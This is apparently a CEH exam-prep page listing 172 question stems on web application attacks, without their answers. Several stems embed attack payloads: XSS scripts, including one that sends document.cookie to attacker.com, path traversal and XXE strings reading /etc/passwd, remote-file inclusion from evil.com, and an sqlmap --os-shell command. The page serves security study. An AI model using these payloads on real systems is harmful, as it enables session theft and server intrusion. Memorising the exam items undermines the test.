Practice CEH Web Application and Injection Attacks questions with full explanations on every answer.
Start practicing
Web Application and Injection Attacks — choose a session length
Free · No account required
Click any question to see the full explanation and answer options, or start a focused practice session above.
A security analyst notices that the web application returns different response times when a valid username is submitted versus an invalid one during login. Which type of vulnerability is likely being exploited?
2Which of the following tools is commonly used to automate the detection and exploitation of SQL injection vulnerabilities?
3A penetration tester intercepts the following request using Burp Suite: POST /change_password HTTP/1.1 Host: example.com Cookie: sessionid=abc123; SameSite=Lax Content-Type: application/x-www-form-urlencoded new_password=Hacker123 The tester successfully crafts a CSRF attack by embedding a hidden form in a malicious page. Which mitigation is most likely missing?
4A web application allows users to upload profile pictures. An attacker uploads a file named "profile.php" containing malicious PHP code. When the attacker visits the uploaded file's URL, the code executes. Which vulnerability is being exploited?
5An analyst observes the following log entry on a web server: GET /../../etc/passwd HTTP/1.1 200. Which type of attack is indicated?
6During a penetration test, a tester uses the following payload in a search field: <script>alert(document.cookie)</script>. The payload is reflected in the response without sanitization. However, the tester notices that the attack only works when the payload is submitted via a POST request, not GET. Which type of XSS is this?
7Which of the following is the primary purpose of using a CSRF token in a web application?
8A web application uses user input in the following PHP code: include($_GET['page'] . '.php');. An attacker submits the URL: http://example.com/index.php?page=../../../../etc/passwd%00. Which two vulnerabilities are being attempted?
9Which Burp Suite tool is most appropriate for modifying and re-sending a single HTTP request multiple times with different payloads to test for SQL injection?
10A penetration tester finds that a web application accepts XML input and returns the parsed data in the response. The tester submits the following payload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The server returns the contents of /etc/passwd. Which vulnerability is being exploited?
11An attacker attempts to log into a web application by trying many common passwords for a list of known usernames. Which type of authentication attack is this?
12A security analyst wants to check if a web application is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions would be most effective?
13Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF)?
14A web application is vulnerable to SQL injection. Which THREE of the following techniques can be used to extract data from the database using blind SQL injection?
15Which TWO of the following are characteristics of stored (persistent) XSS?
16A security analyst observes that after a user submits a comment on a blog, the comment is displayed immediately on the page without sanitization. Another user visits the page and the comment's JavaScript executes in their browser. Which type of XSS attack is this?
17Which of the following tools is primarily used for automated SQL injection exploitation and database fingerprinting?
18A penetration tester needs to perform a brute-force attack on a web application login form. Which Burp Suite tool is specifically designed for automating parameterized attacks like password guessing?
19A web application uses a parameter 'file' to include server-side files. The following request is intercepted: GET /page.php?file=../../../etc/passwd HTTP/1.1. The response contains the contents of /etc/passwd. This vulnerability is most likely which of the following?
20Which of the following is a recommended defense against Cross-Site Request Forgery (CSRF) attacks?
21A tester sends the following payload to a web application: %3Cscript%3Ealert('XSS')%3C/script%3E. The application echoes back the decoded payload in the response without sanitization. This behavior is typical of which type of vulnerability?
22An attacker discovers that a web application's login form allows unlimited login attempts. The attacker uses a list of usernames and passwords obtained from a previous breach to gain access. This attack is known as:
23A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?
24An attacker sends a request to a web server with the following header: X-Forwarded-For: 127.0.0.1. The server processes the request as if it came from localhost and grants administrative access. This is an example of:
25Which of the following is a symptom of a successful command injection attack?
26A web developer wants to mitigate CSRF attacks. Which of the following configurations for cookies is most effective when combined with CSRF tokens?
27During an assessment, a tester discovers that the web application accepts XML input and returns the parsed data. The tester submits the following payload: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The response contains the contents of /etc/passwd. This vulnerability is known as:
28Which TWO of the following are effective defenses against SQL injection attacks?
29Which THREE of the following are common indicators of an ongoing brute-force attack against a web application?
30Which TWO of the following are valid methods to exploit or test for Server-Side Request Forgery (SSRF)?
31A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?
32Which Burp Suite tool is specifically designed to automate customized attacks on web applications, such as brute-forcing login forms or fuzzing parameters?
33During a penetration test, a tester uses SQLMap with the following command: 'sqlmap -u "http://target.com/page?id=1" --os-shell'. The target is a Linux server running MySQL. Which SQL injection technique will SQLMap likely attempt to use to achieve an OS shell?
34A web application allows users to upload profile pictures. The application uses the filename provided by the user to save the file on the server. An attacker uploads a file named 'malicious.php%00.png' and the server saves it as 'malicious.php'. Which vulnerability is being exploited?
35Which of the following is the BEST defense against brute-force attacks on a login form?
36A penetration tester discovers that a web application includes the following code: 'include($_GET['page'] . '.php');' and the application is running on a Linux server. The tester attempts to exploit this by accessing 'index.php?page=../../etc/passwd'. What type of attack is this, and will it succeed?
37An attacker wants to perform a CSRF attack against a banking application. The application uses SameSite cookies set to 'Strict'. The attacker hosts a malicious page on their own domain. When the victim visits the malicious page, which of the following statements is TRUE regarding the CSRF attack?
38A web application uses XML to transmit data between client and server. A tester submits the following payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. The application returns the content of the /etc/passwd file in the response. Which vulnerability is present?
39During a web application test, an analyst intercepts a request containing a 'Referer' header that points to a different domain. The analyst modifies the request by removing the 'Referer' header and the action still executes successfully. Which type of attack is the analyst testing?
40Which of the following is a common indicator of a stored (persistent) Cross-Site Scripting (XSS) attack?
41A web application firewall (WAF) blocks requests containing ' UNION SELECT '. A penetration tester wants to bypass this restriction to perform a union-based SQL injection. Which of the following techniques is MOST likely to succeed?
42An organization wants to prevent directory listing on its Apache web server. Which of the following configuration changes would achieve this?
43Which TWO of the following are effective mitigations against Clickjacking attacks? (Choose 2)
44Which THREE of the following are types of SQL injection attacks? (Choose 3)
45Which TWO of the following are common tools used for web application security testing? (Choose 2)
46A security analyst notices that a web application returns different page sizes when a valid user ID is submitted versus an invalid one in the URL parameter. Which type of vulnerability is most likely being exploited?
47Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications?
48During a web application penetration test, a tester submits a comment containing '<script>alert("XSS")</script>' and the script executes for all users who view the comment. Which type of cross-site scripting (XSS) vulnerability is present?
49A web application uses a URL parameter to fetch a file from the server, e.g., 'download.php?file=report.pdf'. An attacker changes the parameter to '../../etc/passwd' and retrieves the password file. This attack is known as:
50Which of the following is the most effective defense against Cross-Site Request Forgery (CSRF) attacks?
51An attacker intercepts a request and notices that the server reflects the value of the 'User-Agent' header in the response without sanitization. The attacker crafts a payload that triggers an alert box. This is an example of:
52In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?
53A penetration tester finds that a web application allows uploading a file with the name '../../var/www/html/shell.php'. The file is successfully written to the server. Which combination of vulnerabilities does this exploit?
54Which of the following best describes a Server-Side Request Forgery (SSRF) attack?
55A web application uses XML to transfer data. An attacker submits the following payload: '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. What vulnerability is being exploited?
56Which of the following is a common defense against clickjacking attacks?
57A security analyst observes the following in Apache access logs: 'GET /cgi-bin/test.cgi?cmd=id HTTP/1.1' 200. This is most likely an attempt at which attack?
58Which TWO of the following are types of SQL injection? (Select 2)
59Which THREE of the following are effective mitigations against brute force attacks on web application login forms? (Select 3)
60Which TWO of the following attacks can be prevented by properly validating and sanitizing user input? (Select 2)
61A security analyst notices that the web application returns different response times when querying user IDs. For example, a valid user ID returns the page in 2 seconds, while an invalid ID returns in 0.5 seconds. The analyst suspects a blind SQL injection vulnerability. Which SQL injection technique is MOST likely being used?
62Which OWASP Top 10 (2021) category describes the vulnerability where an application allows an attacker to include a remote file from an external server, leading to code execution or data disclosure?
63During a web application penetration test, a tester uses Burp Suite's Repeater tool to manually manipulate a request and observe the response. After sending the same request multiple times, the application returns a 302 redirect pointing to a login page. What is the MOST likely cause?
64A penetration tester is testing an IIS web server and wants to exploit a WebDAV misconfiguration to upload a web shell. Which HTTP method should the tester check to determine if WebDAV is enabled and allows file uploads?
65A security analyst identifies a vulnerability where an attacker can include a local file such as '/etc/passwd' by manipulating the 'page' parameter in the URL: http://example.com/index.php?page=../../../../etc/passwd. What type of attack is this?
66Which of the following is a primary purpose of the SameSite cookie attribute in mitigating CSRF attacks?
67A penetration tester is using SQLMap to automate exploitation of a SQL injection vulnerability found in a login form. The tester wants to retrieve the names of all databases on the backend MySQL server. Which SQLMap flag should be used?
68During a penetration test, the tester finds that the Apache server is configured with directory listing enabled on the /uploads directory. The tester navigates to http://example.com/uploads/ and sees a list of files. Which of the following is the MOST immediate security concern?
69A web application is vulnerable to server-side request forgery (SSRF). An attacker sends a request that causes the server to make an internal HTTP request to http://169.254.169.254/latest/meta-data/. What is the attacker attempting to achieve?
70Which of the following describes the difference between reflected and stored (persistent) cross-site scripting (XSS)?
71A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?
72During a security assessment, a tester discovers an endpoint that reflects the 'User-Agent' header in the response without sanitization. The tester wants to confirm a reflected XSS vulnerability. Which of the following payloads would be MOST effective to demonstrate the issue in a single request?
73Which TWO of the following are effective defenses against CSRF attacks? (Choose 2.)
74Which THREE of the following are common indicators of an SQL injection attack? (Choose 3.)
75Which TWO of the following are valid techniques used in password spraying attacks? (Choose 2.)
76A security analyst notices that a web application returns different HTTP responses for valid and invalid usernames during login. Which attack is this behavior most likely facilitating?
77Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities?
78A penetration tester discovers that a web application's search functionality reflects user input directly in the page source without sanitization. The tester crafts a URL like http://example.com/search?q=<script>alert('XSS')</script> and the script executes. This is an example of which type of XSS?
79During a web application assessment, a tester intercepts a request and modifies the 'Referer' header. The application then performs a state-changing action without requiring a token. Which vulnerability is most likely present?
80A web application allows users to access files using parameters like 'file=report.pdf'. A tester changes the parameter to '../../etc/passwd' and retrieves the system password file. This is an example of which attack?
81A security team is implementing measures to prevent cross-site request forgery (CSRF) attacks. Which of the following is the most effective mitigation technique?
82An analyst notices that a web application's login page returns a generic 'Invalid credentials' message regardless of whether the username is valid. This is an example of which security control?
83A web server is configured with WebDAV and allows PUT requests. An attacker uploads a .asp file and accesses it to execute code. Which tool or method is most directly associated with exploiting this misconfiguration?
84A penetration tester uses a tool to intercept and modify HTTP/HTTPS requests in real-time between the browser and the web application. Which tool is being used?
85An application is vulnerable to server-side request forgery (SSRF). An attacker exploits this to access internal services. Which of the following is a common indicator of SSRF?
86Which of the following best describes the attack where an attacker uses a valid session token to impersonate a user without needing to authenticate?
87A security analyst is reviewing a web application log and sees the following request: GET /page?file=../../../etc/passwd HTTP/1.1. Which TWO vulnerabilities are most likely being attempted? (Select two)
88Which THREE of the following are common types of SQL injection attacks? (Select three)
89An application uses the SameSite cookie attribute. Which TWO of the following are valid values for this attribute and their purposes? (Select two)
90During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)
91A security analyst notices that a web application returns different error messages for valid and invalid usernames during login. Which type of attack is this application MOST vulnerable to?
92During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. You modify the parameter to '../../../etc/passwd' and see the contents of the passwd file. Which type of vulnerability is this?
93Which of the following is the BEST defense against Cross-Site Request Forgery (CSRF) attacks?
94A web application allows users to submit feedback that is stored in a database and displayed to other users without proper sanitization. A tester inputs '<script>alert(1)</script>' and it executes when other users view the feedback. Which type of XSS is this?
95A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page.php?id=1' --batch --dbs. Which database enumeration technique is SQLMap using by default?
96A web server is found to have directory listing enabled for the /uploads folder. An attacker discovers a shell.php file uploaded earlier. Which attack is the attacker MOST likely to perform next?
97A security team wants to test their web application for vulnerabilities. Which Burp Suite tool is BEST suited for automating attacks like brute-force or fuzzing?
98A web application has an endpoint that takes a URL parameter and fetches content from that URL, returning it to the user. An attacker supplies 'file:///etc/passwd' and reads the server's passwd file. Which vulnerability is this?
99Which of the following is a primary defense against SQL injection attacks?
100An attacker performs a password spraying attack against a web application. Which of the following BEST describes this technique?
101A penetration tester finds that a web application includes files based on user input without proper validation. The tester supplies 'http://attacker.com/malicious.txt' and the application includes its content. Which vulnerability is this?
102A web application uses an XML parser to process user-supplied XML documents. An attacker submits the following payload: <?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><root>&xxe;</root>. Which vulnerability is being exploited?
103Which TWO of the following are characteristics of a reflected Cross-Site Scripting (XSS) attack? (Select 2)
104Which TWO of the following are commonly used to mitigate SQL injection vulnerabilities? (Select 2)
105Which THREE of the following are valid defenses against CSRF attacks? (Select 3)
106During a web application penetration test, a security analyst intercepts a request using Burp Suite and notices the following parameter in the URL: /profile?user_id=123. By changing the user_id to 124, the analyst is able to view another user's profile. Which vulnerability is being exploited?
107A security team discovers that their web application is vulnerable to a Server-Side Request Forgery (SSRF) attack. Which of the following is the MOST effective mitigation technique to prevent SSRF?
108Which of the following tools is specifically designed to automate the exploitation of SQL injection vulnerabilities and retrieve data from databases?
109A penetration tester identifies a web page that reflects user input in the response without proper encoding. The input is submitted via a GET parameter. Which type of cross-site scripting (XSS) is MOST likely present?
110A security analyst is reviewing HTTP response headers and notices the following: Set-Cookie: sessionId=abc123; SameSite=Lax. What is the primary purpose of the SameSite attribute?
111During a penetration test, you find a web application that includes files using a parameter like /index.php?page=about. When you change the parameter to /etc/passwd, the application returns the contents of the password file. Which vulnerability is present?
112Which HTTP method is commonly used by WebDAV to upload files to a web server, and if misconfigured, could allow an attacker to upload malicious scripts?
113A web application takes a URL from user input and fetches the content to display on the page. An attacker submits a URL pointing to an internal service like http://localhost:8080/admin. The server retrieves the internal resource and returns it. What is this attack?
114Which of the following Burp Suite tools is used to automatically fuzz web application inputs and identify common vulnerabilities like SQL injection and XSS?
115A penetration tester attempts a SQL injection on a login form and receives no error messages, but notices a delay in the server response when injecting ' OR SLEEP(5)--. Which type of SQL injection is this?
116After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?
117A web application allows users to upload profile images. An attacker uploads a file named 'image.php.png' with malicious PHP code, and the server executes it as PHP. Which type of vulnerability is this?
118Which TWO of the following are effective defenses against Cross-Site Request Forgery (CSRF) attacks? (Select 2)
119Which THREE of the following are types of SQL injection attacks? (Select 3)
120Which TWO of the following are common indicators of a command injection vulnerability? (Select 2)
121A web application tester notices that the application reflects user input in the URL without proper encoding. The tester submits a payload <script>alert('xss')</script> in a search field and the script executes in the browser. Which type of XSS vulnerability is this MOST likely?
122During a penetration test, a security analyst discovers that a web application uses sequential numeric identifiers in URLs (e.g., /profile?id=100). By modifying the id parameter, the analyst can access another user's profile data without authorization. Which vulnerability is being exploited?
123Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications?
124An application allows users to upload XML files for processing. A tester uploads the following payload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The server returns the contents of /etc/passwd. Which attack is being performed?
125A security analyst observes that a web application's login page responds with different HTTP status codes and response times for valid versus invalid usernames. This information leakage could be used to perform which type of authentication attack?
126Which of the following is a primary defense mechanism against Cross-Site Request Forgery (CSRF) attacks?
127A penetration tester uses Burp Suite Repeater to manually modify and resend HTTP requests to a web server. In which phase of the testing methodology is this tool most commonly employed?
128While analyzing web server logs, an analyst finds the following entry: GET /../../../../etc/passwd HTTP/1.1 with a 200 OK response. Which vulnerability is indicated, and what is the MOST likely impact?
129Which of the following describes a Server-Side Request Forgery (SSRF) attack?
130A web application tester uses the following Burp Suite feature to automatically send multiple requests with different payloads to test for common vulnerabilities. Which feature is being used?
131An attacker exploits a vulnerable parameter in a web application by submitting the following payload: http://target.com/page.php?file=http://evil.com/shell.txt. The server returns the contents of the remote file. This is an example of which type of attack?
132A security analyst discovers that a web application's search box reflects user input without proper sanitization. However, the attacker must trick a victim into clicking a crafted link containing the malicious script. This vulnerability is classified as which type?
133A penetration tester is assessing a web application and wants to manually test for SQL injection vulnerabilities. Which TWO tools or techniques are best suited for this task?
134Which THREE of the following are effective mitigation techniques against Cross-Site Scripting (XSS) attacks?
135Which TWO of the following are common types of SQL injection attacks?
136An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?
137A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page?id=1' --batch --dbs. Which of the following best describes what this command will do?
138An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?
139A security analyst notices that a web application uses sequential numeric IDs for user accounts (e.g., /profile?id=1001). By changing the ID to 1002, the analyst can view another user's profile. Which vulnerability is present?
140During a web application penetration test, a tester uses Burp Suite's Intruder tool to automate a series of login attempts using a list of common passwords. Which attack type is being performed?
141An analyst reviews the following HTTP response: HTTP/1.1 200 OK Set-Cookie: sessionid=abc123; SameSite=None; Secure ... <html><body><p>Welcome back!</p></body></html>. What possible vulnerability exists if the application does not use CSRF tokens?
142Which of the following is the most effective defense against SQL injection attacks?
143An attacker exploits an application by uploading a file that contains server-side script code, leading to arbitrary command execution on the web server. Which best describes this attack?
144A security engineer observes that an internal web application uses XML to transmit data between systems. The engineer discovers that by sending a crafted XML payload, they can read sensitive files from the server's filesystem. Which attack is being performed?
145Which Burp Suite tool is specifically designed to intercept and modify HTTP(S) traffic between the browser and the target web application?
146A web application allows users to submit feedback that is stored in a database and later displayed to administrators. An attacker submits feedback containing <script>alert('stored')</script>. When an admin views the feedback page, the script executes. Which type of XSS is this?
147An attacker uses the following URL pattern to access files: http://example.com/../../etc/passwd. Which attack is being attempted?
148Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF) attacks? (Select 2)
149Which THREE of the following are common indicators of a Server-Side Request Forgery (SSRF) vulnerability? (Select 3)
150Which TWO of the following are common methods to detect SQL injection vulnerabilities in a web application? (Select 2)
151A security analyst observes a web application returning database error messages containing table names and column names in the HTTP response. Which type of SQL injection is MOST likely being exploited?
152During a web application test, a penetration tester intercepts a request using Burp Suite Proxy, modifies the 'Referer' header, and resends the request. The application processes the request despite the modified header. Which attack is the tester attempting to validate?
153A web application allows users to view documents by specifying a filename in the URL, e.g., /getDocument?file=report.pdf. A tester changes the file parameter to '../../etc/passwd' and retrieves the system password file. Which vulnerability is being exploited?
154A penetration tester uses SQLMap with the option '--technique=T --dbms=MySQL --level=5 --risk=3' against a login form. The tool returns results after a delay of several seconds per request. Which SQL injection technique is being used?
155A security team deployed a web application firewall (WAF) that blocks requests containing SQL keywords like 'SELECT', 'UNION', and 'DROP'. An attacker bypasses the WAF by encoding the payload in base64 and using a SQL injection tool that decodes it server-side. Which mitigation would be MOST effective against this?
156Which Burp Suite tool is specifically designed to automate customized attacks against web applications, such as brute-forcing login credentials or fuzzing parameters?
157A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames are known from a prior data breach. The tester wants to try a few common passwords across many accounts to avoid account lockouts. Which attack technique is being used?
158A web server running IIS 8.5 is found to have WebDAV enabled with write permissions. Which attack is MOST likely to be successful against this configuration?
159An attacker crafts a link that, when clicked by an authenticated user, performs an unintended action on a web application where the user is logged in, such as changing their email address. The application uses a session cookie for authentication but does not include any anti-forgery tokens in forms. Which attack is this?
160A security analyst identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). Which TWO of the following are effective mitigation techniques for SSRF?
161During a penetration test, a tester finds a web application that reflects user input in the page without sanitization. Which TWO types of XSS are potentially exploitable in this scenario?
162An attacker is attempting to perform an Insecure Direct Object Reference (IDOR) attack on a web application. Which TWO conditions are necessary for this attack to succeed?
163A pentester uses Burp Suite's Intruder to perform a brute-force attack on a login form. Which THREE of the following Intruder attack types would be appropriate for testing different payload combinations?
164A web application is vulnerable to XML External Entity (XXE) injection. Which THREE of the following are potential impacts of successfully exploiting an XXE vulnerability?
165A penetration tester is performing a check for HTTP response splitting. Which THREE of the following conditions must be present for this attack to succeed?
166A security analyst notices that a web application's search functionality returns database error messages in the response. The analyst suspects SQL injection. Which TWO techniques should the analyst use to confirm and exploit this vulnerability? (Choose TWO.)
167During a web application penetration test, a tester discovers a file inclusion vulnerability. Which THREE of the following are potential impacts or exploitation scenarios? (Choose THREE.)
168A security engineer is reviewing web server logs and finds the following request: GET /files/../../../etc/passwd HTTP/1.1. Which THREE attacks could be associated with this request? (Choose THREE.)
169A penetration tester uses Burp Suite to intercept and modify web traffic. Which TWO features in Burp Suite would be MOST useful for performing a brute-force attack on a login form? (Choose TWO.)
170A web application uses cookies for session management. The application is vulnerable to CSRF. Which THREE of the following are effective mitigation techniques? (Choose THREE.)
171A web application tester encounters a parameter that is reflected in the response without sanitization. The tester suspects XSS. Which TWO types of XSS could be present in this scenario? (Choose TWO.)
172During a web application test, the tester finds that the application includes user-supplied file names in include() statements. Which TWO of the following are indicators of a Remote File Inclusion (RFI) vulnerability? (Choose TWO.)
The Web Application and Injection Attacks domain covers the key concepts tested in this area of the CEH exam blueprint published by EC-Council. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CEH domains — no account required.
The Courseiva CEH question bank contains 172 questions in the Web Application and Injection Attacks domain. Click any question to see the full explanation and answer breakdown.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the Web Application and Injection Attacks domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.
Save your results, see per-domain analytics, and get readiness scores — free, for every certification.
Sign Up FreeFree forever · Every certification included